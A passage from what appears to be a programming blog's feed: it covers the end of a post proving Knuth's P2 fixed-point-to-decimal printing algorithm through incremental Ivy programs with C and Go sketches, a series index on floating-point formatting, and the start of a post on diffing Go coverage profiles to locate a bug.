:if t > 1
s = (s - t/2) + 1/2
:end
d = d, floor s
s = s mod 1
s = 10 * s
t = 10 * t
:if s <= t
:ret d
:end
:end
</pre>
<pre class='language-ivy'>check 'move conditional return'
-- out --
✅ move conditional return
</pre>
<p>
Finally, let’s merge the consecutive assignments to <math><mi>s</mi></math> and <math><mi>t</mi></math>,
both at the top of <code>bin2dec</code> and in the loop:
<pre class='language-ivy'>op bin2dec f =
s = 10 * f + 2**-17
t = 10 * 2**-16
d = ()
:while 1
:if t > 1
s = (s - t/2) + 1/2
:end
d = d, floor s
s = 10 * s mod 1
t = 10 * t
:if s <= t
:ret d
:end
:end
</pre>
<pre class='language-ivy'>check 'merge assignments'
-- out --
✅ merge assignments
</pre>
<a class=anchor href="#scaling"><h2 id="scaling">Scaling</h2></a>
<p>
All that remains is to eliminate the use of rational arithmetic,
which we can do by scaling <math><mi>s</mi></math> and <math><mi>t</mi></math> by <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></math>:
<pre class='language-ivy'>op bin2dec f =
s = (10 * f * 2**16) + 5
t = 10
d = ()
:while 1
:if t > 2**16
s = (s - t/2) + 2**15
:end
d = d, floor s/2**16
s = 10 * s mod 2**16
t = 10 * t
:if s <= t
:ret d
:end
:end
</pre>
<pre class='language-ivy'>check 'no more rationals'
-- out --
✅ no more rationals
</pre>
<p>
If written in a modern compiled language,
this is a very efficient program.
(In particular, <code>floor s/2**16</code> and <code>s mod 2**16</code> are simple bit operations:
<code>s >> 16</code> and <code>s & 0xFFFF</code> in C syntax.)
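<p>
To make that concrete, here is a sketch of how this final version might be written in C.
It is a direct transcription of the Ivy program above;
the function name, the <code>uint32_t</code> types, and the <code>emit</code> callback
are illustrative choices, not part of Knuth’s <i>P2</i>.
<pre class='language-c'>#include <stdint.h>

// Sketch: emit the shortest accurate, correctly rounded decimal digits
// of the 16-bit binary fraction n/65536 (0 <= n < 65536), one per call
// to emit. Transcribed from the scaled Ivy program; names are ours.
static void bin2dec(uint32_t n, void (*emit)(int digit)) {
    uint32_t s = 10*n + 5; // scaled max: (10 * (f + 2^-17)) * 2^16
    uint32_t t = 10;       // scaled interval width: (10 * 2^-16) * 2^16
    for (;;) {
        if (t > (1 << 16))
            s = s + (1 << 15) - t/2; // last digit: round f instead of truncating max
        emit(s >> 16);               // next digit is floor(s / 2^16)
        s = 10 * (s & 0xFFFF);       // keep only the fraction, premultiply by 10
        t = 10 * t;
        if (s <= t)
            return;
    }
}
</pre>
<p>
Called with <code>n = 26214</code>, the value of <code>dec2bin 0.4</code>,
this emits the single digit 4, matching the Ivy runs above.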
<p>
And we have arrived at Knuth’s <i>P2</i>!
<pre class='language-ivy'>)op knuthP2
-- out --
op knuthP2 f =
n = f * 2**16
s = (10 * n) + 5
t = 10
d = ()
:while 1
:if t > 65536
s = s + 32768 - t/2
:end
d = d, floor s/65536
s = 10 * (s mod 65536)
t = 10 * t
:if s <= t
:ret d
:end
:end
</pre>
<p>
We started with a trivially correct program
and then incrementally modified it,
proving the correctness of each non-trivial step,
to arrive at <i>P2</i>.
We have therefore proved the correctness of <i>P2</i> itself.
<a class=anchor href="#simpler"><h2 id="simpler">Simpler Programs and Proofs</h2></a>
<p>
We passed a more elegant iterative solution a few steps back.
If we start with the premultiplied version,
apply the change of basis <math><mrow><mi>ε</mi><mo>=</mo><MI>𝑚𝑎𝑥</MI><mo>−</mo><mi>f</mi><mo>=</mo><mi>f</mi><mo>−</mo><MI>𝑚𝑖𝑛</MI></mrow></math>,
scale by <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></math>, and change the program to
return an integer instead of a digit vector,
we arrive at:
<pre class='language-ivy'>op shortest f =
p = 1
f = 10 * f * 2**16
ε = 5
:while p < 5
:if (ceil (f-ε)/2**16) <= floor (f+ε)/2**16
:ret (floor (f+ε)/2**16) p
:end
p = p + 1
f = f * 10
ε = ε * 10
:end
(round f/2**16) p
</pre>
<p>
The program returns the digits as an integer accompanied by a digit count.
Any modern language can print an integer zero-padded to a given number of digits,
so there is no need for our converter to compute those digits itself.
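<p>
As a sketch of that convention, here is how <code>shortest</code> and the final printing step
might look in C.
The names and the <code>printf</code> formatting are illustrative, not prescribed by the Ivy code;
a 64-bit integer is used because the scaled value overflows 32 bits, a point we return to below.
<pre class='language-c'>#include <stdint.h>
#include <stdio.h>

// Sketch of the f, ε version above for a 16-bit fraction n/65536.
// Returns the decimal digits packed into an integer and stores the
// digit count in *p. Names are ours.
static int64_t shortest(uint32_t n, int *p) {
    int64_t f = 10 * (int64_t)n; // 10 * f * 2^16, where f = n/65536
    int64_t eps = 5;             // 10 * 2^-17 * 2^16
    for (*p = 1; *p < 5; (*p)++) {
        int64_t lo = (f - eps + 65535) / 65536; // ceil((f-ε)/2^16)
        int64_t hi = (f + eps) / 65536;         // floor((f+ε)/2^16)
        if (lo <= hi)
            return hi;                          // shortest accurate decimal found
        f *= 10;                                // 64 bits needed: f reaches 10^5 * n
        eps *= 10;
    }
    return (f + 32768) / 65536; // round(f/2^16): all five digits are needed
}

int main(void) {
    int p;
    int64_t d = shortest(26214, &p);  // 26214/65536 is dec2bin 0.4
    printf("0.%0*d\n", p, (int)d);    // zero-padded to p digits: prints 0.4
    return 0;
}
</pre>
<p>
The zero padding matters for inputs like <code>dec2bin 0.05</code> (3277/65536),
for which <code>shortest</code> returns 5 with a digit count of 2, so the padded print gives 0.05.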
<p>
We can test <code>shortest</code> by writing <code>bin2dec</code> in terms of <code>shortest</code> and <code>digits</code>:
<pre class='language-ivy'>op bin2dec f =
d p = shortest f
p digits d
</pre>
<pre class='language-ivy'>check 'simpler'
-- out --
✅ simpler
</pre>
<p>
The full proof of correctness is left as an exercise for the reader,
but note that the proof is simpler than the one we just gave for <i>P2</i>.
Since we are not collecting digits one at a time,
we do not need the <a href="#collection">Digit Collection Lemma</a>.
<p>
This version of <code>shortest</code> could be made faster
by using <i>P2</i>’s <math><mrow><mi>s</mi><mo>,</mo><mi>t</mi></mrow></math> basis,
but I think this form using the <math><mrow><mi>f</mi><mo>,</mo><mi>ε</mi></mrow></math> basis is clearer,
and the cost is only one extra addition in the loop body.
The cost of that addition is unlikely to be important compared to
the two multiplications and other arithmetic
(two shifts, one subtraction, one comparison, one increment).
<p>
One drawback of this simpler program is that it requires
<math><mi>f</mi></math> to hold numbers up to <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>5</mn></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>></mo><mn>2</mn><msup><mspace height='0.66em' /><mn>32</mn></msup></mrow></math>,
so it needs <math><mi>f</mi></math> to be a 64-bit integer,
and the system Knuth was using probably did not support 64-bit integers.
However, we can adapt this simpler program to
work with 32-bit integers
by observing that each multiplication by 10 adds a new
always-zero low bit, so we can multiply by 5 and adjust
the precision <math><mi>b</mi></math>:
<pre class='language-ivy'>op shortest f =
b = 16
p = 1
f = 10 * f * 2**b
ε = 5
:while p < 5
:if (ceil (f-ε)/2**b) <= floor (f+ε)/2**b
:ret (floor (f+ε)/2**b) p
:end
p = p + 1
b = b - 1
f = f * 5
ε = ε * 5
:end
(round f/2**b) p
</pre>
<pre class='language-ivy'>check '32-bit'
-- out --
✅ 32-bit
</pre>
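<p>
Here is the same 32-bit idea sketched in C; as before, the names are illustrative.
The largest intermediate value is 6250·65535, which fits comfortably in a signed 32-bit integer.
<pre class='language-c'>#include <stdint.h>

// Sketch of the 32-bit variant above: multiply by 5 instead of 10 and
// lower the binary point b by one each iteration. Names are ours.
static int32_t shortest32(uint16_t n, int *p) {
    int b = 16;
    int32_t f = 10 * (int32_t)n; // 10 * f * 2^b with b = 16
    int32_t eps = 5;             // ε scaled the same way
    for (*p = 1; *p < 5; (*p)++) {
        int32_t lo = (f - eps + (1 << b) - 1) / (1 << b); // ceil((f-ε)/2^b)
        int32_t hi = (f + eps) / (1 << b);                // floor((f+ε)/2^b)
        if (lo <= hi)
            return hi;
        b--;      // *10 would add an always-zero low bit; use *5 and move the binary point
        f *= 5;   // largest value: 6250 * 65535 < 2^31
        eps *= 5;
    }
    return (f + (1 << (b - 1))) / (1 << b); // round(f/2^b)
}
</pre>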
<p>
All modern languages provide efficient 64-bit arithmetic,
so we don’t need that optimization today.
<a class=anchor href="#more_direct_solution"><h2 id="more_direct_solution">A More Direct Solution</h2></a>
<p>
Raffaello Giulietti’s <a href="https://fmt.dev/papers/Schubfach4.pdf">Schubfach algorithm</a>
avoids the iteration entirely.
Applied to Knuth’s problem,
we can let <math><mrow><mi>p</mi><mo>=</mo><mrow><mo stretchy=false>⌈</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow><mo stretchy=false>⌉</mo></mrow><MO>(=</MO><mn>5</mn><mo stretchy=false>)</mo></mrow></math> and
compute the exact set of accurate <math><mi>p</mi></math>-digit decimals
<math><mrow><mo>[</mo><msub><mrow><mo stretchy=false>⌈</mo><MI>𝑚𝑖𝑛</MI><mo stretchy=false>⌉</mo></mrow><mi>p</mi></msub><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><msub><mrow><mo stretchy=false>⌊</mo><MI>𝑚𝑎𝑥</MI><mo stretchy=false>⌋</mo></mrow><mi>p</mi></msub><mo>]</mo></mrow></math>.
That set contains at most 10 consecutive decimals
(or else <math><mi>p</mi></math> would be smaller),
so at most one can end in a zero.
If one of the accurate decimals <math><mi>d</mi></math> ends in zero,
we can use <math><mi>d</mi></math> after removing its trailing zeros.
(The <a href="#truncating">Truncating Lemma</a> guarantees
that this shortest accurate decimal will be correctly rounded.)
Otherwise,
we should use the correctly rounded <math><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mi>p</mi></msub></math>.
<pre class='language-ivy'>op shortest f =
b = 16
p = ceil 10 log 2**b
f = (10**p) * f * 2**b
t = (10**p) * 1/2
min = ceil (f - t) / 2**b
max = floor (f + t) / 2**b
:if ((d = floor max / 10) * 10) >= min
p = p - 1
:while ((d mod 10) == 0) and p > 1
d = d / 10
p = p - 1
:end
:ret d p
:end
(round f / 2**b) p
</pre>
<pre class='language-ivy'>check 'schubfach'
-- out --
✅ schubfach
</pre>
<p>
This program still contains a loop,
but only to remove trailing zeros.
In many use cases, short outputs will happen less often than
full-length outputs, so most calls will not loop at all.
Also, all modern compilers implement division by a constant
<a href="divmult">using multiplication</a>,
so the loop costs at most <math><mrow><mi>p</mi><MO lspace='0' rspace='0'>−</MO><mn>1</mn></mrow></math> multiplications.
Finally, we can shorten the worst case,
at the expense of the best case,
by using a <math><mrow><mo stretchy=false>(</mo><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /><mi>p</mi><mo stretchy=false>)</mo></mrow></math>-iteration loop:
divide away <math><mrow><mo stretchy=false>⌊</mo><mrow><mi>p</mi><mn>/2</mn></mrow><mo stretchy=false>⌋</mo></mrow></math> trailing zeros
(by checking <math><mrow><mi>d</mi><MO>mod</MO><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo stretchy=false>⌊</mo><mrow><mi>p</mi><mn>/2</mn></mrow><mo stretchy=false>⌋</mo></mrow></msup></mrow></math>), then <math><mrow><mo stretchy=false>⌊</mo><mrow><mi>p</mi><mn>/4</mn></mrow><mo stretchy=false>⌋</mo></mrow></math>, and so on.
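<p>
Here is one way to realize that idea, sketched in Go rather than Ivy; the helper is illustrative and uses chunk sizes that are descending powers of two (4, 2, 1 when <math><mrow><mi>p</mi><mo>=</mo><mn>5</mn></mrow></math>), a slight rearrangement of the halving schedule just described, so that any number of trailing zeros up to <math><mrow><mi>p</mi><MO lspace='0' rspace='0'>−</MO><mn>1</mn></mrow></math> can be removed with a logarithmic number of divisibility checks:
<pre>// trimZeros removes the trailing zeros of the p-digit decimal d,
// keeping at least one digit, using O(log p) divisibility checks.
func trimZeros(d, p int) (int, int) {
	pow10 := func(n int) int {
		v := 1
		for i := 0; i < n; i++ {
			v *= 10
		}
		return v
	}
	// Start with the largest power of two below p and halve from there.
	chunk := 1
	for chunk*2 < p {
		chunk *= 2
	}
	for ; chunk >= 1; chunk /= 2 {
		if q := pow10(chunk); p > chunk && d%q == 0 {
			d /= q
			p -= chunk
		}
	}
	return d, p
}
</pre>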
<a class=anchor href="#textbook"><h2 id="textbook">A Textbook Solution</h2></a>
<p>
All of this raises a mystery.
Knuth started writing TeX82, which introduced the 16-bit fixed-point number
representation, in August 1981 (according to “<a href="https://yurichev.com/mirrors/knuth1989.pdf">The Errors of TeX</a>”, page 616),
and the change to introduce shortest outputs
was made in February 1984 (according to <a href="https://ctan.math.utah.edu/ctan/tex-archive/systems/knuth/dist/errata/tex82.bug">tex82.bug, entry 284</a>).
The mystery is why Knuth,
working in the early 1980s, did not consult a recently published
textbook that contains the answer,
namely
<i>The Art of Computer Programming, Volume 2: Seminumerical Algorithms (Second Edition)</i>, by D. E. Knuth
(preface dated July 1980).
<center>
<img src="detour1.png" width="100" height="100" alt="Detour sign"><br>
</center>
<p>
Before getting to the mystery, we need to detour through
the history of that specific answer.
The first edition of Volume 2 (preface dated October 1968), contained exercise 4.4-3:<blockquote>
<ol>
<li>
[25] (D. Taranto.) The text observes that when fractions are being converted,
there is in general no obvious way to decide how many digits to give in the answer.
Design a simple generalization of Method (2a)
[incremental digit-at-a-time fraction conversion]
which, given two positive radix <math><mi>b</mi></math> fractions <math><mi>u</mi></math> and <math><mi>ε</mi></math> between 0 and 1,
converts <math><mi>u</mi></math> to a radix <math><mi>B</mi></math> equivalent <math><mi>U</mi></math> which has just enough
places of accuracy to ensure that <math><mrow><mrow><mn>|</mn><mrow><mi>U</mi><mo>−</mo><mi>u</mi></mrow><mn>|</mn></mrow><mo><</mo><mi>ε</mi></mrow></math>.
(If <math><mrow><mi>u</mi><mo><</mo><mi>ε</mi></mrow></math>, we may take <math><mrow><mi>U</mi><mo>=</mo><mn>0</mn></mrow></math>, with zero “places of accuracy.”)</ol>
</blockquote>
<p>
The answer at the back of the book starts with the notation “[CACM 2 (July 1959), 27]”,
indicating Taranto’s article “<a href="https://dl.acm.org/doi/10.1145/368370.368376">Binary conversion, with fixed decimal precision, of a decimal fraction</a>”.
Taranto’s article is about converting a decimal fraction to a shortest binary
representation, a somewhat simpler problem than Knuth’s exercise poses.
Written in Ivy, with variable names chosen to match this post,
and scaling to accumulate bits in an integer during the loop,
Taranto’s algorithm is:
<pre class='language-ivy'>op taranto (f ε) =
fb = 0
b = 0
:while (ε < f) and (f < 1-ε)
f = 2 * f
fb = (2 * fb) + floor f
f = f mod 1
ε = 2 * ε
b = b + 1
:end
:if (fb & 1) == 0
fb = fb + 1
:end
fb / 2**b
</pre>
<p>
If we write <math><mrow><mi>f</mi><msub><mspace height='0em' /><mn>0</mn></msub></mrow></math> and <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub></mrow></math> for the initial <math><mi>f</mi></math> and <math><mi>ε</mi></math>
passed to <code>taranto</code>,
then the algorithm accumulates the output bits in the integer <math><mrow><mi>f</mi><msub><mspace height='0em' /><mi>b</mi></msub></mrow></math>,
and maintains <math><mrow><mi>f</mi><mo>=</mo><mi>f</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo>−</mo><mi>f</mi><msub><mspace height='0em' /><mi>b</mi></msub></mrow></math>,
the scaled error of the current output <math><mrow><mi>f</mi><msub><mspace height='0em' /><mi>b</mi></msub><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow></math> compared to the original input.
When <math><mrow><mi>f</mi><mo>≤</mo><mi>ε</mi></mrow></math>, <math><mrow><mi>f</mi><msub><mspace height='0em' /><mi>b</mi></msub></mrow></math> is close enough;
when <math><mrow><mi>f</mi><mo>≥</mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math>, <math><mrow><mi>f</mi><msub><mspace height='0em' /><mi>b</mi></msub><mo>+</mo><mn>1</mn></mrow></math> is close enough.
Otherwise, the algorithm loops to add another output bit.
<p>
After the loop, the algorithm forces the low bit to 1.
This handles the “when <math><mrow><mi>f</mi><mo>≥</mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math>, <math><mrow><mi>f</mi><msub><mspace height='0em' /><mi>b</mi></msub><mo>+</mo><mn>1</mn></mrow></math> is close enough” case.
It would have been clearer to write <math><mrow><mi>f</mi><mo>≥</mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math>,
but testing the low bit is equivalent.
If the last bit added was 0,
the final iteration started with <math><mrow><mi>ε</mi><mo><</mo><mi>f</mi></mrow></math> and did <math><mrow><mi>f</mi><mo>=</mo><mn>2</mn><mi>f</mi><mo>,</mo><mi>ε</mi><mo>=</mo><mn>2</mn><mi>ε</mi></mrow></math>,
in which case <math><mrow><mi>ε</mi><mo><</mo><mi>f</mi></mrow></math> must still be true
and the loop ended because <math><mrow><mi>f</mi><mo>≥</mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math>.
And if the last bit added was 1,
the final iteration started with <math><mrow><mi>f</mi><mo><</mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math> and did <math><mrow><mi>f</mi><mo>=</mo><mn>2</mn><mi>f</mi><mo>−</mo><mn>1</mn><mo>,</mo><mi>ε</mi><mo>=</mo><mn>2</mn><mi>ε</mi></mrow></math>,
in which case <math><mrow><mi>f</mi><mo><</mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math> must still be true
and the loop ended because <math><mrow><mi>f</mi><mo>≤</mo><mi>ε</mi></mrow></math>.
<p>
(In fact, Taranto’s presentation took advantage of the fact that
the low bit tells you which half of the loop condition is possible;
it only checked the possible half in each iteration.
For simplicity, the Ivy version omits that optimization.
If you read Taranto’s article, note that the computation
of the loop condition is correct in step B at the top of the page
but incorrect in the IAL code at the bottom of the page.)
<p>
For the answer to exercise 4.4-3, Knuth needed to
generalize Taranto’s algorithm to non-binary outputs (<math><mrow><mi>B</mi><mo>></mo><mn>2</mn></mrow></math>),
which he did by changing the final condition to <math><mrow><mi>f</mi><mo>></mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math>.
For decimal output, the implementation would be:
<pre class='language-ivy'>op shortest f =
ε = 2**-17
d = 0
p = 0
:while (ε < f) and (f < 1-ε)
f = 10 * f
d = (10 * d) + floor f
f = f mod 1
ε = 10 * ε
p = p + 1
:end
:if f > 1-ε
d = d + 1
:end
d (1 max p)
</pre>
<p>
Knuth’s presentation generated digits one at a time
into an array.
I’ve accumulated them into an integer <math><mi>d</mi></math> here,
but that’s only a storage detail.
When incrementing the low digit after the loop,
Knuth’s answer also checked for overflow
from the low digit into higher digits.
That check is unnecessary: if the increment
overflows the bottom digit to zero,
that implies the bottom digit can be removed entirely,
in which case the loop would have stopped earlier.
<p>
It turns out that this code is not an answer
to our problem:
<pre class='language-ivy'>check 'Knuth Volume 2 1e'
-- out --
❌ Knuth Volume 2 1e
</pre>
<p>
The problem is that while it does compute a
shortest accurate decimal, it does not guarantee
correct rounding:
<pre class='language-ivy'>shortest dec2bin 0.12344
-- out --
12345 5
</pre>
<p>
For binary output,
shortest and correctly rounded are one and the same;
not so in other bases.
As an aside, Taranto’s forcing of the low bit to 1
mishandles the corner case <math><mrow><mi>f</mi><mo>=</mo><mn>0</mn></mrow></math>.
Knuth’s updated condition fixes that case,
but it doesn’t correctly round other cases.
All that said, Knuth’s exercise did not ask for correct rounding,
so the answer is still correct for the exercise.
<p>
Guy L. Steele and Jon L. White, working in the 1970s
on fixed-point and floating-point formatting,
consulted Knuth’s first edition and adapted this answer
to round correctly.
They wrote a paper with their new algorithms,
both for the fixed-point case we are considering
and for the more general case of floating-point numbers.
That paper presents a correctly-rounding extension of Knuth’s
first edition answer as the algorithm ‘(FP)³’.
The change is tiny: replace <math><mrow><mi>f</mi><mo>></mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math> with <math><mrow><mi>f</mi><mo>≥</mo><mn>½</mn></mrow></math>.
<pre class='language-ivy'>op shortest f =
ε = 2**-17
d = 0
p = 0
:while (ε < f) and (f < 1-ε)
f = 10 * f
d = (10 * d) + floor f
f = f mod 1
ε = 10 * ε
p = p + 1
:end
:if f >= 1/2
d = d + 1
:end
d (1 max p)
</pre>
<pre class='language-ivy'>check 'Steele and White (FP)³'
-- out --
✅ Steele and White (FP)³
</pre>
<p>
In the paper,
Steele and White described the (FP)³ algorithm as
“a generalization of the one
presented by Taranto [Taranto59]
and mentioned in exercise 4.4.3 of [Knuth69].”
They shared the paper with Knuth
while he was working on the second edition of Volume 2.
In response, Knuth changed the exercise to ask for a
“<i>rounded</i> radix <math><mi>B</mi></math> equivalent” (my emphasis),
updated the answer to use the new fix-up condition,
removed the unnecessary overflow check,
and cited Steele and White’s unpublished paper.
Knuth introduced the revised answer by saying,
“The following procedure due to G. L. Steele Jr. and Jon L. White
generalizes Taranto’s algorithm for <math><mrow><mi>B</mi><mo>=</mo><mn>2</mn></mrow></math> originally published in
<i>CACM</i> <b>2</b>, 7 (July 1959), 27.”
The attribution ‘due to [Steele and White]’
omits Knuth’s own substantial contributions
to the generalization effort.
<p>
Steele and White <a href="https://dl.acm.org/doi/10.1145/93548.93559">published their paper in 1990</a>,
and
Knuth cited it in the third edition of Volume 2 (preface dated July 1997).
At first glance, this seems to create a circular reference in which
both works credit the other for the algorithm,
like a self-justifying
<a href="https://research.swtch.com/plmm#acausality">out-of-thin-air value</a>.
The cycle is broken by noticing that Steele and White carefully
cite the <i>first edition</i> of Volume 2.
<center>
<img src="detour2.png" width="100" height="100" alt="Detour sign"><br>
</center>
<p>
In 1984, as Knuth was writing TeX82 and needed code to
implement this conversion, the second edition
had just been published a few years earlier.
So why did Knuth invent a new variant of Taranto’s algorithm
instead of using the one he put in Volume 2?
I find it comforting to imagine that
he made the same mistake we’ve all made
at one time or another: perhaps Knuth simply forgot to check <i>Knuth</i>.
<p>
But probably not.
Knuth’s “Simple Program” paper
names Steele and White and
cites the answer to exercise 4.4-3.
The wording of the citation suggests that Knuth did not consider
it an answer to his question “Is there a better program?”
Why not?
I don’t know,
but we just saw that it does work.
I plan to
<a href="https://www-cs-faculty.stanford.edu/~knuth/email.html">send Knuth a letter</a> to ask.
<p>
<small>(<a href="https://cs.stanford.edu/~knuth/diamondsigns/D05.html">Detour</a> <a href="https://cs.stanford.edu/~knuth/diamondsigns/D09.html">sign</a> <a href="https://cs.stanford.edu/~knuth/diamondsigns/diam.html">photos</a> by Don Knuth.)</small>
<a class=anchor href="#conclusion"><h2 id="conclusion">Conclusion</h2></a>
<p>
This post shows what I think is a better way to prove the
correctness of Knuth’s <i>P2</i>,
as well as a few candidates for better programs.
More generally, I think the post illustrates that
the capabilities of our programming tools affect
the programs we write with them and
how easy it is to prove those programs correct.
<p>
If you are programming a 32-bit computer in the 1980s using a Pascal-like language
in which division is expensive,
it makes perfect sense to compute one digit at a time in a loop
as Knuth did in <i>P2</i>.
Going back even further, the iterative digit-at-a-time approach
<a href="https://www.ias.edu/sites/default/files/library/pdfs/ecp/planningcodingof0103inst.pdf">made sense on Von Neumann’s computer in the 1940s</a> (see p. 53).
Today, a language
with arbitrary precision rationals
makes it easy to write simpler programs.
<p>
The choice of language also affects the difficulty of the proof.
Using Ivy made it natural to break the proof into pieces.
We started with a simple proof of a nearly trivial program.
Then we proved the correctness of the “truncated max” version.
Finally we proved the correctness of collecting digits one at a time.
It was easier to write three small proofs than one large proof.
Ivy also made it easy to isolate the complexity of premultiplication
by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> and scaling by <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></math>; we were able to treat those
steps as optimizations instead of fundamental aspects of the program and proofs.
Now that we know the path, we could write a direct proof of <i>P2</i>
along these lines.
But I wouldn’t have seen the path without having a capable language
like Ivy to light the way.
<p>
It is also worth noting how the capabilities of our programming
tools affect our perception of what is important in our programs.
After writing his 1989 paper, Knuth optimized
‘<i>s</i> := <i>s</i> + 32768 − (<i>t</i> <b>div</b> 2)’
in the production version of TeX to
‘<i>s</i> := <i>s</i> − 17232’, because at that point
<i>t</i> is always 100000.
On the <a href="https://en.wikipedia.org/wiki/IBM_650">IBM 650</a> at Case Institute of Technology
where Knuth got his start
(and to which he dedicated his <i>The Art of Computer Programming</i> books),
removing a division and an addition might have been important.
In 1989, however, a good compiler would have optimized ‘<i>t</i> <b>div</b> 2’ to a shift,
and the shift and add would hardly matter compared to the
eight multiplications that preceded them, not to mention the I/O
to print the result,
and the code was probably clearer the first way.
But old habits die hard for all of us.
I spent my formative years programming 32-bit systems, and
I have not broken my old habit
of worrying about ‘32-bit safety’,
as evidenced by <a href="#simpler">the discussion above</a>!
<p>
Knuth wrote in his paper that
“we seek a proof that is comprehensible and educational” and then added:<blockquote>
<p>
Even more, we seek a proof that reflects the ideas used to create
the program, rather than a proof that was concocted ex post facto.
The program didn’t emerge by itself from a vacuum, nor did I simply
try all possible short programs until I found one that worked.</blockquote>
<p>
This post is almost certainly not the proof Knuth sought.
On the other hand, I hope that it is comprehensible and educational.
Also, Taranto’s short article
doesn’t include any proof at all,
nor even an explanation of how it works.
If I had to prove Taranto’s algorithm correct,
I would probably proceed as in the initial part of this post.
Then, if you accept Taranto’s algorithm as correct,
the main changes on the way to <i>P2</i> are to
nudge <math><mi>f</mi></math> up to <math><MI>𝑚𝑎𝑥</MI></math> at the start
and then nudge it back down on the final iteration.
The
<a href="#truncating">Truncating Lemma</a>
and the <a href="#collection">Digit Collection Lemma</a>
prove the correctness of those changes.
Maybe that does match what Knuth had in mind in 1984
when he adapted Taranto’s algorithm.
Maybe the difficulty arose from
having to prove Taranto’s algorithm correct simultaneously.
This post’s incremental approach avoids that complication.
<p>
In any event, Happy 88th Birthday Don!
<p>
<p>
P.S. This is my first blog post using my blog’s new support for
embedding Ivy code and for typesetting equations.
For the latter, I write TeX syntax like inline <code>`$s ≤ t$`</code>
or fenced <code>```eqn</code> blocks.
A new TeX macro parser that I wrote executes the TeX input
and translates the expanded output to MathML Core,
which all the major browsers now support.
It is only fitting that this is the first post to use
the new TeX-derived mathematical typesetting.
Floating Point Formattingtag:research.swtch.com,2012:research.swtch.com/fp-all2026-01-10T08:00:00-05:002026-01-10T08:02:00-05:00Topic Index
<p>
These are the posts in the “Floating Point Formatting” series,
which started in 2011 and continued in 2026.
<ul>
<li>
“<a href="ftoa">Floating Point to Decimal Conversion is Easy</a>” (2011)
<li>
“<a href="fp-knuth">Pulling a New Proof from Knuth’s Fixed-Point Printer</a>” (2026)
<li>
“<a href="fp">Floating-Point Printing and Parsing Can Be Simple And Fast</a>” (2026)
<li>
“<a href="fp-proof">Fast Unrounded Scaling: Proof by Ivy</a>” (2026)</ul>
Differential Coverage for Debuggingtag:research.swtch.com,2012:research.swtch.com/diffcover2025-04-25T11:40:00-04:002025-04-25T11:42:00-04:00Diffing code coverage for passing and failing runs can identify suspicious code blocks.<style>
pre {
white-space: pre-wrap; /* Since CSS 2.1 */
white-space: -moz-pre-wrap; /* Mozilla, since 1999 */
white-space: -pre-wrap; /* Opera 4-6 */
white-space: -o-pre-wrap; /* Opera 7 */
word-wrap: break-word; /* Internet Explorer 5.5+ */
}
</style>
<p>
I have been debugging some code I did not write and was reminded of this technique.
I’m sure it’s a very old debugging technique (like <a href="bisect">bisection</a>),
but it should be more widely known.
Suppose you have one test case that’s failing.
You can get a sense of what code might be involved by comparing the code coverage
of successful tests with the code coverage of the failing test.
<p>
For example, I’ve inserted a bug into my development copy of <code>math/big</code>:
<pre>
$ <b>go test</b>
--- FAIL: TestAddSub (0.00s)
int_test.go:2020: addSub(-0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff) = -0x0, -0x1fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe, want 0x0, -0x1fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe
FAIL
exit status 1
FAIL math/big 7.528s
$
</pre>
<p>
Let’s collect a passing and failing profile:
<pre>
$ <b>go test -coverprofile=c1.prof -skip='TestAddSub$'</b>
PASS
coverage: 85.0% of statements
ok math/big 8.373s
$ <b>go test -coverprofile=c2.prof -run='TestAddSub$'</b>
--- FAIL: TestAddSub (0.00s)
int_test.go:2020: addSub(-0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff) = -0x0, -0x1fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe, want 0x0, -0x1fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe
FAIL
coverage: 4.7% of statements
exit status 1
FAIL math/big 0.789s
$
</pre>
<p>
Now we can diff them to make a profile showing what’s unique about the failing test:
<pre>
$ <b>(head -1 c1.prof; diff c[12].prof | sed -n 's/^> //p') >c3.prof</b>
$ <b>go tool cover -html=c3.prof</b>
</pre>
<p>
The <code>head -1</code> is preserving the one-line coverage profile header. The <code>diff | sed</code> saves only the lines unique to the failing test’s profile, and the <code>go tool cover -html</code> opens the profile in a web browser.
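<p>
For context, a coverage profile is plain text: a one-line <code>mode:</code> header followed by one line per code block, giving the block’s file and position, its number of statements, and a count recording whether (or how many times) it ran. The file names and numbers below are illustrative, not taken from the real run:
<pre>mode: set
math/big/natdiv.go:672.22,675.3 2 0
math/big/natmul.go:58.30,60.3 1 1
</pre>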
<p>
